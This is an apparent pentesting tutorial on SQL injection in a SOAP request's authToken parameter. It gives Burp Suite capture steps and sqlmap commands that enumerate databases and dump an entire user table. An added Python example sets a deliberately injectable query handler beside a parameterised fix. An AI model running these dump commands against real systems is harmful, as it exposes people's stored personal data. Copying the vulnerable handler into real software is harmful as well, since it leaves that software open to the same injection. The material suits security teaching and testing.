To test (and exploit) a SOAP message for SQL injection, do the following:

  1. Capture the request in Burp Suite (switch on intercept for the request).
  2. Copy the whole request and save it as a file. (You could also check whether a specific parameter in the request is vulnerable to SQL injection: in my example I replace the authToken parameter with a ' and I get a “nice” error message back in the response.)
  3. Use the following sqlmap command: sqlmap -r /root/Documents/wsdl.txt -p authToken where </root/Documents/wsdl.txt> is the file you saved and <authToken> is the parameter that you want to test for SQLi
  4. The parameter is vulnerable and we are informed the back-end database is MySQL.
  5. We can now move on to getting some information from the database. Enumerate the databases: sqlmap -r /root/Documents/wsdl.txt -p authToken --dbs
  6. We find the database we are after: in this example, the database containing users, called email3
  7. Next stop, dump everything: sqlmap -r /root/Documents/wsdl.txt -p authToken --dbs --dump
  8. We get what we are after: the whole database, with a table called user and all the user information.
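
The server-side flaw that the single-quote probe in step 2 reveals, shown beside its fix. This is an added example, not code from the original post: the handler functions, envelope layout and table contents are constructed, and sqlite3 stands in for the MySQL back end so it runs offline.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Constructed SOAP body; only the authToken element name comes from the post.
ENVELOPE = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Body><getUser><authToken>{token}</authToken></getUser></soapenv:Body>"
    "</soapenv:Envelope>"
)


def make_db():
    # sqlite3 stands in for the MySQL back end (assumption for this example).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (name TEXT, token TEXT)")
    db.execute("INSERT INTO user VALUES ('alice', 'tok-123')")
    return db


def extract_token(envelope):
    # Find authToken anywhere in the body, ignoring XML namespaces.
    for elem in ET.fromstring(envelope).iter():
        if elem.tag.rsplit("}", 1)[-1] == "authToken":
            return elem.text or ""
    raise ValueError("authToken missing")


def lookup_vulnerable(db, envelope):
    # Token concatenated into the SQL text: a lone quote breaks the statement
    # and the raw database error is echoed back to the caller.
    token = extract_token(envelope)
    try:
        rows = db.execute("SELECT name FROM user WHERE token = '" + token + "'").fetchall()
    except sqlite3.Error as exc:
        return "SOAP Fault: " + str(exc)
    return [r[0] for r in rows]


def lookup_hardened(db, envelope):
    # Token bound as a parameter: it is always treated as data, never as SQL.
    token = extract_token(envelope)
    try:
        rows = db.execute("SELECT name FROM user WHERE token = ?", (token,)).fetchall()
    except sqlite3.Error:
        return "SOAP Fault: internal error"  # no database detail leaked
    return [r[0] for r in rows]
```

With the hardened handler, the same single-quote value simply matches no row, so there is no error message for a tester or a tool to key on.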
